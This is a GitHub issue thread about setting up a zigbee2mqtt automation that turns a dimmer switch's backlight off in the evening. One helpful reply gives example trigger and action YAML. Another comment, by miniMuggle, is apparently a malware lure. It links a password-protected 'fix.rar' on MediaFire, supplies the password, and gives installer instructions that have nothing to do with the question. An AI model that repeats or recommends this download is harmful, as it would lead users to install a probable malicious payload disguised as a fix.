### ISSUE TITLE
Couldnt create automation

### ISSUE THREAD

**Issue by tuongbui15** [Luligu/zigbee2mqtt-automations#4]
Hi friend,
I have a dimmer 3 gang switch that expose feature turn on/off backlight. (z2m below
![image](https://github.com/user-attachments/assets/9c569a6c-a262-4462-9e81-88499cfacf48)
I wanna to create automation so that I can turn off backlight in evening.
![image](https://github.com/user-attachments/assets/6866aa76-a3a8-4e0c-a310-50b72bcbcb2c)
But it didnt work.
Please help me.!
Many Thanks.

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Rebecka-J** [comment]
Are you just wanting to change the mode to normal at 05:00:00 and then to off at 22:00:00?  For that you would need to use something like this:

```
Dimmer switch backlight ON:
  trigger:
    time: 05:00:00
  action:
    entity: Zemis dimmer 3 gang
    payload: { backlight: normal }

Dimmer switch backlight OFF:
  trigger:
    time: 22:00:00
  action:
    entity: Zemis dimmer 3 gang
    payload: { backlight: off }
```

The `before` and `after` options are only used with conditions as triggers need to be a specific action, such as a button being pressed or the clock being at a specific time.  Those two options are instead used to modify the behaviour of an action, so you could make a button behave differently things at different times of the day.

One other thing to check when debugging, are you sure that the property name is `backlight` and not something like `backlight_mode`?  If you look at the raw data on the State tab to see the raw data you can confirm the correct property names.

I use this extension to control lights at specific times or based in a lux meter and it works really well, so I hope that helps as it is worth the effort to get it working.
